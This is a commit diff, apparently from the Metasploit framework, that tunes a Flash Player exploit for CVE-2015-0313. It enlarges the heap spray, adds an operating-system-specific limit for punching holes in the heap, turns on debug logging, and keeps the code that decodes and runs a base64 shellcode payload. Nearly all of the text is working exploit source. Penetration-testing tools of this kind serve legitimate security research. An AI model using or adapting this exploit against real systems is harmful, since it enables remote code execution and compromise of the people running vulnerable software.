Tweak Heap Spray

2015-06-10 10:55:50 -05:00 · 2015-06-10 10:55:50 -05:00 · 2b4fe96cfd
parent fb531d0069
commit 2b4fe96cfd
4 changed files with 17 additions and 4 deletions
--- a/data/exploits/CVE-2015-0313/msf.swf
+++ b/data/exploits/CVE-2015-0313/msf.swf
--- a/external/source/exploits/CVE-2015-0313/Exploit.as
+++ b/external/source/exploits/CVE-2015-0313/Exploit.as
@ -23,7 +23,7 @@ import mx.utils.Base64Decoder

 public class Exploit extends Sprite
 {
-    private var ov:Vector.<Object> = new Vector.<Object>(80000)
+    private var ov:Vector.<Object> = new Vector.<Object>(120000)
    private var uv:Vector.<uint>
    private var ba:ByteArray = new ByteArray()
    private var worker:Worker
@ -44,6 +44,16 @@ public class Exploit extends Sprite
    {
        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
        os = LoaderInfo(this.root.loaderInfo).parameters.os
+		Logger.log("od: " + os)
+		var ov_limit:uint
+		if (os == "Windows 8.1" || os == "Windows 8") {
+			ov_limit = 80000
+		} else {
+			ov_limit = 60000
+		}
+		Logger.log("ov: " + ov.length.toString())
+		Logger.log("ov_limit: " + ov_limit.toString())
+		
        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
        var pattern:RegExp = / /g;
        b64_payload = b64_payload.replace(pattern, "+")
@ -52,11 +62,13 @@ public class Exploit extends Sprite

        ba.length = 0x1000
        ba.shareable = true
+		Logger.log("spray")
        for (var i:uint = 0; i < ov.length; i++) {
            ov[i] = new Vector.<uint>(1014)
            ov[i][0] = 0xdeedbeef
        }
-        for (i = 0; i < ov.length / 2; i += 2) {
+		Logger.log("holes")
+        for (i = 0; i < ov_limit; i += 2) {
 			delete(ov[i])
 		}
        worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
@ -65,6 +77,7 @@ public class Exploit extends Sprite
        worker.setSharedProperty("mc", mc)
        worker.setSharedProperty("ba", ba)
        ApplicationDomain.currentDomain.domainMemory = ba
+		Logger.log('go')
        worker.start()
    }

--- a/external/source/exploits/CVE-2015-0313/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@ -32,7 +32,7 @@ package
            payload = p
            platform = pl
            op_system = os
-
+			
            ev = new ExploitVector(uv)
            if (!ev.is_ready()) return
            eba = new ExploitByteArray(platform)
--- a/external/source/exploits/CVE-2015-0313/Logger.as
+++ b/external/source/exploits/CVE-2015-0313/Logger.as
@ -3,7 +3,7 @@ package
    import flash.external.ExternalInterface

    public class Logger {
-        private static const DEBUG:uint = 0
+        private static const DEBUG:uint = 1
 
        public static function alert(msg:String):void
        {